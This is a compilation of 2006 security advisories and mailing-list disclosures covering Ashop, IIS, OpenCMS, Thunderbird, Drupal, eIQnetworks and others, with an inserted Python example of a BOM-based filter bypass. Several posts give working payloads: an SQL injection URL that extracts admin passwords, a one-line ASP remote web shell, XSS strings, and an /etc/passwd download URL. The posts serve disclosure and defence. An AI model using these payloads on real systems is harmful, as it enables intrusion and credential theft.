Re: Ashop Search Module SQL injection
On Tue, 13 Jun 2006, [EMAIL PROTECTED] wrote:

: http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27&cmdSearch=Search
:
: credits: EntriKa The_BeKiR erne

Which Ashop is this?

AShop Software                 www.ashopsoftware.com/
Ashop Shopping Cart Software   www.ashop.com.au/
ASHOP                          www.ashop.com.hk/
Ashop                          www.ashop.co.il/
Ashop                          www.ashop.at/
ashop.co.uk                    www.ashop.co.uk/
[..]

Something else?
[ MDKSA-2006:131 ] - Updated perl-Net-Server packages fix format string vulnerability
Mandriva Linux Security Advisory                         MDKSA-2006:131
http://www.mandriva.com/security/

Package : perl-Net-Server
Date    : July 25, 2006
Affected: Corporate 3.0

Problem Description:

Peter Bieringer discovered a flaw in the perl Net::Server module where the log function was not safe against format string exploits in version 0.87 and earlier. Updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1127

Updated Packages:

Corporate 3.0:
33e4382b4ad9bf5a1894298a468895e8  corporate/3.0/RPMS/perl-Net-Server-0.85-3.1.C30mdk.noarch.rpm
9294cea422b1a149b5a13ad4f8824780  corporate/3.0/SRPMS/perl-Net-Server-0.85-3.1.C30mdk.src.rpm

Corporate 3.0/X86_64:
891bb910d688342cf8a9fde373694b70  x86_64/corporate/3.0/RPMS/perl-Net-Server-0.85-3.1.C30mdk.noarch.rpm
9294cea422b1a149b5a13ad4f8824780  x86_64/corporate/3.0/SRPMS/perl-Net-Server-0.85-3.1.C30mdk.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID     Date        User ID
pub  1024D/22458A98 2000-07-10  Mandriva Security Team security*mandriva.com
Full Path Disclosure xGuestBook v1.02
### Dicomdk Full Path Disclosure xGuestBook v1.02 ###
# http://xatrix.xa.funpic.de/xguestbook2/
# By: X-boy

http://[HOST]/post.php

Test:
  http://xatrix.xa.funpic.de/xguestbook2/post.php

Result:
  Notice: Undefined index: user in [site]\post.php on line 15
  Notice: Undefined index: mail in [site]\post.php on line 16
  Notice: Undefined index: p in [site]\post.php on line 17
  Notice: Undefined index: url in [site]\post.php on line 19

Patch:

- Open post.php
- Find:

    $user = HTMLSPECIALCHARS(trim($_POST['user']));
    $email = HTMLSPECIALCHARS(trim($_POST['mail']));
    $post = nl2br(HTMLSPECIALCHARS($_POST['p']));
    $post = str_replace(" ", "&nbsp;", $post);
    $url = HTMLSPECIALCHARS(trim($_POST['url']));
    $date = date("Y-m-d g:i:s");

- Change to:

    // Only read the form fields when they were actually submitted; a bare
    // GET of post.php otherwise triggers "Undefined index" notices that
    // reveal the script's filesystem path.
    if (isset($_POST['user']) AND isset($_POST['mail']) AND isset($_POST['p']) AND isset($_POST['url'])) {
        $user = HTMLSPECIALCHARS(trim($_POST['user']));
        $email = HTMLSPECIALCHARS(trim($_POST['mail']));
        $post = nl2br(HTMLSPECIALCHARS($_POST['p']));
        $post = str_replace(" ", "&nbsp;", $post);
        $url = HTMLSPECIALCHARS(trim($_POST['url']));
        $date = date("Y-m-d g:i:s");
    }
MS06-034 lies? IIS 6 can still be owned?
Hi all.

After getting the details of MS06-034 early, I thought it would be cool to build the exploits, since there has been a long time without any IIS exploit and our customers (see *1) would like it, so I asked the guys to build the exploits and said that I would take care of the part of elevating privileges, since I had some theory that there was a way to elevate privileges. What was funny is that some time later I realized that if you can upload an ASP page then it's pretty simple to have a remote shell running under the same account that the exploits would run:

--- shell.asp (got this from xfocus.org) ---
<%= server.createobject("wscript.shell").exec("cmd.exe /c " & request("command")).stdout.readall %>
---

So I wonder why MS patched the vulnerability if it's pretty simple to have a remote shell on default configurations? Maybe because wscript.shell can be disabled, removed, etc., or you can't run nor upload .exe on the server; in these cases the exploit will be handy.

Also MS stated:

- on Mitigating Factors:
  "On IIS 5.0 and IIS 5.1, ASP enabled applications by default run in the 'Pooled Out of Process' application, which means they run in DLLHOST.exe, which is running in the context of the low privilege IWAM_machinename account. By default, ASP is not enabled on IIS 6.0. If ASP is enabled, it runs in the context of a W3WP.exe worker process running as the low privilege 'NetworkService' account."

- on FAQ / Workarounds:
  "What might an attacker use the vulnerability to do? An attacker who successfully exploited this vulnerability could take complete control of the affected system."

That's pretty confusing, since they are saying IIS 5 & 6 run under low privileged accounts and then they say an attacker could take complete control...???

My theory on the elevation of privileges was in part wrong, but I could elevate privileges, so now the exploits can also give you a remote shell under an administrative account, which I think is why MS patched the vulnerability.

While MS fixed the ASP vulnerability, they didn't fix a design flaw that allows elevating privileges if you can run code under the IIS 5 & 6 low privileged accounts :) So no matter if you applied the fix, if you let users upload and run binaries from ASP pages on default settings then your server can still be owned.

Cesar.

(*1 http://www.argeniss.com/products.html)
Secunia Research: AutoVue SolidModel Professional Buffer Overflow Vulnerability
==
Secunia Research 26/07/2006

- AutoVue SolidModel Professional Buffer Overflow Vulnerability -
==

Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Secunia
9) Verification

==
1) Affected Software

* AutoVue SolidModel Professional Desktop Edition version 19.1 Build 5993.

Other versions may also be affected.

==
2) Severity

Rating: Moderately Critical
Impact: System Access
Where:  Remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in AutoVue SolidModel Professional Desktop Edition, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error within the handling of ARJ, RAR, and ZIP archives. This can be exploited to cause a stack-based buffer overflow when a malicious archive containing a file with an overly long filename is opened.

Successful exploitation allows execution of arbitrary code.

==
4) Solution

Do not open untrusted archives.

==
5) Time Table

07/07/2006 - Initial vendor notification.
12/07/2006 - Second vendor notification.
19/07/2006 - Third vendor notification.
26/07/2006 - Public disclosure.

==
6) Credits

Discovered by Tan Chew Keong, Secunia Research.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-3350 for the vulnerability.

==
8) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

==
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-56/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==
[USN-297-3] Thunderbird vulnerabilities
===
Ubuntu Security Notice USN-297-3          July 26, 2006
mozilla-thunderbird vulnerabilities
CVE-2006-2775, CVE-2006-2776, CVE-2006-2778, CVE-2006-2779, CVE-2006-2780, CVE-2006-2781, CVE-2006-2783, CVE-2006-2784, CVE-2006-2787
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.04:
  mozilla-thunderbird  1.0.8-0ubuntu05.04.1

Ubuntu 5.10:
  mozilla-thunderbird  1.0.8-0ubuntu05.10.2

After a standard system upgrade you need to restart Thunderbird to effect the necessary changes.

Details follow:

USN-297-1 fixed several vulnerabilities in Thunderbird for the Ubuntu 6.06 LTS release. This update provides the corresponding fixes for Ubuntu 5.04 and Ubuntu 5.10. For reference, these are the details of the original USN:

Jonas Sicking discovered that under some circumstances persisted XUL attributes are associated with the wrong URL. A malicious web site could exploit this to execute arbitrary code with the privileges of the user. (MFSA 2006-35, CVE-2006-2775)

Paul Nickerson discovered that content-defined setters on an object prototype were getting called by privileged UI code. It was demonstrated that this could be exploited to run arbitrary web script with full user privileges (MFSA 2006-37, CVE-2006-2776).

Mikolaj Habryn discovered a buffer overflow in the crypto.signText() function. By sending an email with malicious JavaScript to a user, and that user enabled JavaScript in Thunderbird (which is not the default and not recommended), this could potentially be exploited to execute arbitrary code with the user's privileges. (MFSA 2006-38, CVE-2006-2778)

The Mozilla developer team discovered several bugs that lead to crashes with memory corruption. These might be exploitable by malicious web sites to execute arbitrary code with the privileges of the user. (MFSA 2006-32, CVE-2006-2779, CVE-2006-2780)

Masatoshi Kimura discovered a memory corruption (double-free) when processing a large VCard with invalid base64 characters in it. By sending a maliciously crafted set of VCards to a user, this could potentially be exploited to execute arbitrary code with the user's privileges. (MFSA 2006-40, CVE-2006-2781)

Masatoshi Kimura found a way to bypass web input sanitizers which filter out JavaScript. By inserting 'Unicode Byte-order-Mark (BOM)' characters into the HTML code (e. g. 'scr[BOM]ipt'), these filters might not recognize the tags anymore; however, Thunderbird would still execute them since BOM markers are filtered out before processing a mail containing JavaScript. (MFSA 2006-42, CVE-2006-2783)

Kazuho Oku discovered various ways to perform HTTP response smuggling when used with certain proxy servers. Due to different interpretation of nonstandard HTTP headers in Thunderbird and the proxy server, a malicious HTML email can exploit this to send back two responses to one request. The second response could be used to steal login cookies or other sensitive data from another opened web site. (MFSA 2006-33, CVE-2006-2786)

It was discovered that JavaScript run via EvalInSandbox() can escape the sandbox. Malicious scripts received in emails containing JavaScript could use these privileges to execute arbitrary code with the user's privileges.
(MFSA 2006-31, CVE-2006-2787)

Updated packages for Ubuntu 5.04:
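The BOM-splitting sanitizer bypass described under MFSA 2006-42 above, as an added example that is not part of the advisory: a tag filter that inspects the raw input misses 'scr[BOM]ipt', while the same check run after the consumer's own normalization catches it. The filter functions, the normalization model and the sample messages are constructed for illustration; the general variant that drops every Unicode format (Cf) character goes a step beyond the BOM case the advisory names.

```python
import unicodedata

BOM = "\ufeff"  # U+FEFF, byte-order mark / zero-width no-break space
BLOCKED_TAGS = ("script", "iframe", "object", "embed")


def naive_filter(html: str) -> bool:
    """Flawed check: looks for blocked tags in the input exactly as received.
    Returns True when a blocked tag is found."""
    lowered = html.lower()
    return any("<" + tag in lowered for tag in BLOCKED_TAGS)


def strip_bom(html: str) -> str:
    """Model of what the mail client does: BOM code points are dropped before
    the HTML is parsed, so 'scr<BOM>ipt' reaches the parser as 'script'."""
    return html.replace(BOM, "")


def strip_format_chars(html: str) -> str:
    """Broader normalization (an assumption beyond the advisory): drop every
    Unicode 'Cf' (format) character, which covers U+FEFF, zero-width space,
    zero-width joiner and similar invisible code points."""
    return "".join(ch for ch in html if unicodedata.category(ch) != "Cf")


def hardened_filter(html: str) -> bool:
    """Run the tag check on the normalized text so the filter sees the same
    string the downstream parser will see."""
    return naive_filter(strip_format_chars(html))


def bypasses_naive_filter(html: str) -> bool:
    """True when the raw-input filter passes a message that the consumer
    would still execute as script, i.e. exactly the MFSA 2006-42 situation."""
    return (not naive_filter(html)) and naive_filter(strip_bom(html))


# Constructed sample messages
PLAIN = "<b>hello</b>"
OBVIOUS = "<script>alert(1)</script>"
BOM_SPLIT = "<scr" + BOM + "ipt>alert(1)</scr" + BOM + "ipt>"
ZWSP_SPLIT = "<scr\u200bipt>alert(1)</script>"

if __name__ == "__main__":
    for label, msg in (("plain", PLAIN), ("obvious", OBVIOUS),
                       ("bom-split", BOM_SPLIT), ("zwsp-split", ZWSP_SPLIT)):
        print(f"{label:10s} naive={naive_filter(msg)!s:5} "
              f"hardened={hardened_filter(msg)!s:5} "
              f"bypass={bypasses_naive_filter(msg)}")
```

The defensive point is the ordering: any filter must run on the text after the same canonicalization the consumer applies, otherwise the two see different documents.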
[USN-320-2] php4 regression
===
Ubuntu Security Notice USN-320-2          July 26, 2006
php4 regression
https://launchpad.net/bugs/53581
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.04:
  libapache2-mod-php4  4:4.3.10-10ubuntu4.6
  php4-cgi             4:4.3.10-10ubuntu4.6
  php4-cli             4:4.3.10-10ubuntu4.6

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

USN-320-2 fixed several vulnerabilities in PHP. James Manning discovered that the Ubuntu 5.04 update introduced a regression: the function tempnam() caused a crash of the PHP interpreter in some circumstances. The updated packages fix this.

We apologize for the inconvenience.

Updated packages for Ubuntu 5.04:
EzUpload multi file vulnerabilities
I don't know if anyone has reported this, but I detected it when testing EzUpload Pro 2.2.0.

An attacker can re-configure the EzUpload system without logging in:

File: filter.php   -- change Extensions Mode (file type).
File: access.php   -- change Protection Method to accept anyone uploading files.
File: edituser.php -- add a user who can upload.
File: settings.php -- change admin information.
File: index.php    -- upload a file without login, even if the system requires login.

Check it and have fun.
Multiple vulnerabilities in OpenCMS
Multiple access control and input validation vulnerabilities in
OpenCMS (Open Source Website Content Management System)

0. ORIGINAL ADVISORY

http://o0o.nu/~meder/OpenCMS_multiple_vulnerabilities.txt

I. BACKGROUND

OpenCms is a professional level Open Source Website Content Management System. OpenCms helps to create and manage complex websites easily without knowledge of html. OpenCms is based on Java and XML technology. [1]

II. DESCRIPTION

OpenCms versions 6.2.1, 6.2, 6.0.3, 6.0.4 (possibly older versions too) are vulnerable to multiple access control and input validation vulnerabilities, which allow authenticated users to perform the following unauthorized actions:

* View and download application's log file;
* Download arbitrary files from the system;
* View sources of JSP files (provided they are locked by some other user);
* Add webusers;
* Upload new OpenCms modules;
* Overwrite existing OpenCms modules;
* Upload database import/export files;
* Overwrite existing database import/export files;
* Send broadcast messages to all users;
* Send JavaScript to any user (XSS);
* Obtain list of all users and groups

Most of the access control vulnerabilities mentioned above can be exploited by accessing the URL that provides the functionality, while logged in as an unprivileged user (member of the Users group). The following URLs (wrapped) can be used to reproduce the vulnerabilities on OpenCms v.6.2:

* View and download application's log file:
  http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
  path=%2Fworkplace%2Flogfileview

* Download arbitrary files from the system:
  http://[target]/opencms/opencms/system/workplace/admin/workplace/logfileview/
  downloadTrigger.jsp?filePath=/etc/passwd

* View sources of JSP files (JSP file must be locked by any other user):
  http://[target]/opencms/opencms/system/workplace/editors/editor.jsp?
  resource=/index.jsp

* Add webusers:
  http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
  path=%2Faccounts%2Fwebusers/new

* Upload new OpenCms modules (by uploading a file with the name of an existing module, it will be overwritten):
  http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
  path=%2Fmodules%2Fmodules_import

* Upload database import/export files (by uploading a file with the name of an existing import/export file, it will be overwritten):
  http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
  path=%2Fdatabase%2Fimporthttp

* Send broadcast messages to all users:
  http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
  path=%2Fworkplace%2Fbroadcast

* Send arbitrary JavaScript to any user. Input the following JavaScript as message body to be executed in the browser of the user(s) the message is destined to (XSS):
  </script><script>a=/XSS BUG/; alert(a.source)</script>

* Obtain list of all users:
  http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
  path=%2Faccounts/users

Vulnerabilities outlined above may lead to server compromise, loss of confidentiality and integrity of data stored on the server.

III. VENDOR STATUS

Version 6.2.2 has been released to address discovered vulnerabilities. New version is available at:
http://www.opencms.org/opencms/en/download/opencms.html

IV. DISCLOSURE TIMELINE

13/07/2006 - Bugreport describing the vulnerabilities submitted
18/07/2006 - Initial vendor response acknowledging issues
20/07/2006 - Fixes committed to CVS
21/07/2006 - New version (6.2.2) of OpenCMS addressing the issues released

V. ACKNOWLEDGEMENTS

Alexander Kandzior and Andreas Zahner for timely response and resolution of issues.

VI. REFERENCES

1. OpenCms (Open Source Website Content Management System) homepage, http://www.opencms.org/
2. XSS Cheat sheet, http://ha.ckers.org/xss.html
3. WebScarab, http://www.owasp.org/software/webscarab.html

--
http://o0o.nu/~meder
[SECURITY] [DSA 1111-2] New Linux kernel 2.6.8 packages fix privilege escalation
- --------------------------------------------------------------------------
Debian Security Advisory DSA 1111-2                      [EMAIL PROTECTED]
http://www.debian.org/security/                               Dann Frazier
July 26th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : kernel-source-2.6.8 et. al.
Vulnerability  : race condition
Problem-Type   : local
Debian-specific: no
CVE ID         : CVE-2006-3625

It was discovered that a race condition in the process filesystem can lead to privilege escalation.

The following matrix explains which kernel version for which architecture fixes the problem mentioned above:

  Debian 3.1 (sarge)
    Source                    2.6.8-16sarge4
    Alpha architecture        2.6.8-16sarge4
    AMD64 architecture        2.6.8-12sarge4
    Intel IA-32 architecture  2.6.8-16sarge4
    Intel IA-64 architecture  2.6.8-14sarge4
    PowerPC architecture      2.6.8-12sarge4
    Sun Sparc architecture    2.6.8-15sarge4
    IBM S/390                 2.6.8-5sarge4
    Motorola 680x0            2.6.8-4sarge4
    HP Precision              2.6.8-6sarge3
    FAI                       1.9.1sarge3

The initial advisory lacked builds for the IBM S/390, Motorola 680x0 and HP Precision architectures, which are now provided. Also, the kernels for the FAI installer have been updated.

We recommend that you upgrade your kernel package immediately and reboot the machine. If you have built a custom kernel from the kernel source package, you will need to rebuild to take advantage of these fixes.

Upgrade Instructions
- --------------------

  wget url
    will fetch the file for you
  dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

  apt-get update
    will update the internal database
  apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge - Source archives:
Re: Write-up by Amit Klein: Forging HTTP request headers with Flash
Hi

A reader going by the nickname xeek pointed out to me that the examples in the paper making use of the HTTP GET request do not work as-is (thanks xeek!). After looking at the matter, I realized that I made a silly mistake. In my research, I toyed with the LoadVars.send() method with 2 arguments (url and target window), and had Flash automatically select the appropriate method (GET if empty body, POST if non-empty body). The exploit works fine this way. When I documented my findings, I decided to explicitly add the HTTP method, to clarify the write-up. BIG mistake - turns out that in such a case, Flash doesn't send the headers if GET is used (sounds like a bug...). And pity I didn't verify the exact code I used in the write-up...

Anyway, to summarize - there's a mistake in the document, and it's easily fixed. In each GET example, simply remove the explicit method (i.e. delete all instances of ,"GET" in the write-up). For example (the first example in the paper):

[...]
req.send("http://www.vuln.site/some/page.cgi?p1=v1&p2=v2", "_blank");

This works as advertised, and as also verified by xeek.

Thanks, and sorry for the mistake,
-Amit
wwwThreads XSS
#--
# Aria-Security.net Advisory
# Discovered by: l2odon
# www.Aria-security.net
# Gr33t to: A.u.r.a O.U.T.L.A.W [EMAIL PROTECTED] @ DrtRp Cl0wn
#---
# Software: wwwThreads
# Attack method: Cross Site Scripting
# Original advisory: http://www.aria-security.net/advisory/wwwthreads.txt
#
# Proof of Concept:
#
# http://www.site.com/[path]/calendar.php?week=;<script>alert('test!')</script>
#
#--
#
# Solution
# contact me: [EMAIL PROTECTED]
#
#--
Zyxel Prestige 660H-61 Cross-Site Scripting
Zyxel Prestige 660H-61 Cross-Site Scripting

Tested on: Zyxel Prestige 660H-61, ZyNOS F/W Version: V3.40(PT.0)b32 | 1/28/2005, Standard: NORMAL

Discovered by: José Ramón Palanco: jose.palanco(at)eazel(dot).es
http://www.eazel.es

Description:

The Zyxel Prestige 660H-61 ADSL Router is vulnerable to a security vulnerability that allows Cross-Site Scripting attacks. Due to improper filtering, a remote attacker can cause cross site scripting in this script:

http://router/Forms/rpSysAdmin?a=%3Cscript%3Ealert('www.eazel.es')%3C/script%3E

Original advisory:
http://www.eazel.es/media/advisory004-Zyxel-Prestige-660H-61-Cross-Site-Scripting.html
Professional Home Page Tools Login Script Cross Site Scripting Vulnerabilities
Advisory: Professional Home Page Tools Login Script Cross Site Scripting Vulnerabilities
Release Date: 2006/07/25
Last Modified: 2006/07/25
Author: Tamriel [tamriel at gmx dot net]
Application: Professional Home Page Tools Login Script
Risk: Low
Vendor Status: contacted
Vendor Site: www.php-tools.eu

Overview:

Quote from php-tools.eu: "This login script offers you simple features to protect your web content. Registration can be disabled if you do not want further users to sign up. The integrated content management system gives you the option of making web content visible only to logged-in users."

Details:

In the registration form only the email address is checked. In all other fields you can insert HTML tags or something like that.

Version note: I haven't found any information about the actual version of this script, so take a look at the md5 hashes of the files I checked:

f598cc788dd1a45677cf7cb6ee6d3b5b  functions.php
ba2a2c5792cdd77151341c5fa78ecbfc  index.php
c2e3e52bcd02cfc1103e79aa14e721ce  main.php

Solution:

Take a look at PHP's htmlentities function.
PHP-Auction SQL injection
#--
# Aria-Security.net Advisory
# Discovered by: l2odon
# www.Aria-security.net
# Gr33t to: A.u.r.a O.U.T.L.A.W [EMAIL PROTECTED] @ DrtRp Cl0wn
#---
# Software: PHP-Auction
# Vendor: http://www.vhcs.net
# Attack method: SQL Injection
# Original advisory: http://www.aria-security.net/advisory/phpauction.txt
#
# Proof of Concept:
#
# http://www.site.com/phpbb/auction_room.php?ar=[num][sql]
# http://www.site.com/phpbb/auction_rating.php?mode=view&u=[num][sql]
# http://www.site.com/phpbb/auction_store.php?mode=store&u=[num][sql]
# http://www.site.com/phpbb/auction_room.php?order=price_asc&ar=[num][sql]
#
#--
#
# Solution
# contact me: [EMAIL PROTECTED]
#
#--
TP-Book = 1.00 Cross Site Scripting Vulnerabilities
Advisory: TP-Book = 1.00 Cross Site Scripting Vulnerabilities
Release Date: 2006/07/25
Last Modified: 2006/07/25
Author: Tamriel [tamriel at gmx dot net]
Application: TP-Book = 1.00
Risk: Low
Vendor Status: not contacted
Vendor Site: tobias.kloy.googlepages.com

Overview:

Quote from tobias.kloy.googlepages.com: "The guestbook has the following features:
- Customizable templates
- Many systems to keep out persistent spammers
- Admin control panel
- Easy installation through a wizard"

Details:

In your guestbook posts the name is not checked by the script. Attackers can thus perform cross site scripting attacks.

Solution:

Take a look at PHP's htmlentities function.
ZDI-06-023: eIQNetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerability
ZDI-06-023: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since by Digital Vaccine protection filter ID N/A. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More details can be found at:
http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
           - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Titon, JxT, KF and the rest of Bastard Labs.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
TSRT-06-04: eIQnetworks Enterprise Security Analyzer Topology Server Buffer Overflow Vulnerability
TSRT-06-04: eIQnetworks Enterprise Security Analyzer Topology Server Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/TSRT-06-04.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since July 24, 2006 by Digital Vaccine protection filter ID 4500. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability.

The specific flaw exists within Topology.exe, which binds by default to TCP port 10628. During the processing of long prefixes to the GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE command, a stack based buffer overflow occurs.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More details can be found at:
http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.24 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint Security Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at:
http://www.tippingpoint.com/security

The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service.
TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities
TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities
http://www.zerodayinitiative.com/advisories/TSRT-06-03.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since July 24, 2006 by Digital Vaccine protection filter ID 4319. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability.

The flaw specifically exists within the Syslog daemon, syslogserver.exe, during the processing of long arguments passed through various commands on TCP port 10617. The following commands are known to be affected:

DELTAINTERVAL
LOGFOLDER
DELETELOGS
FWASERVER
SYSLOGPUBLICIP
GETFWAIMPORTLOG
GETFWADELTA
DELETERDEPDEVICE
COMPRESSRAWLOGFILE
GETSYSLOGFIREWALLS
ADDPOLICY
EDITPOLICY

The majority of the above cases result in a stack overflow and are trivial to exploit.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More details can be found at:
http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.24 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint Security Research Team.
[SECURITY] [DSA 1125-1] New drupal packages fix execution of arbitrary web script code
- --------------------------------------------------------------------------
Debian Security Advisory DSA 1125-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                         Moritz Muehlenhoff
July 26th, 2006                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : drupal
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2742 CVE-2006-2743 CVE-2006-2831 CVE-2006-2832 CVE-2006-2833
Debian Bug     : 368835

Several remote vulnerabilities have been discovered in the Drupal web site platform, which may lead to the execution of arbitrary web script. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2006-2742
    A SQL injection vulnerability has been discovered in the count and from variables of the database interface.

CVE-2006-2743
    Multiple file extensions were handled incorrectly if Drupal ran on Apache with mod_mime enabled.

CVE-2006-2831
    A variation of CVE-2006-2743 was addressed as well.

CVE-2006-2832
    A Cross-Site-Scripting vulnerability in the upload module has been discovered.

CVE-2006-2833
    A Cross-Site-Scripting vulnerability in the taxonomy module has been discovered.

For the stable distribution (sarge) these problems have been fixed in version 4.5.3-6.1sarge1.

For the unstable distribution (sid) these problems have been fixed in version 4.5.8-1.1.

We recommend that you upgrade your drupal packages.

Upgrade Instructions
- --------------------

wget <url>
    will fetch the file for you
dpkg -i <file.deb>
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

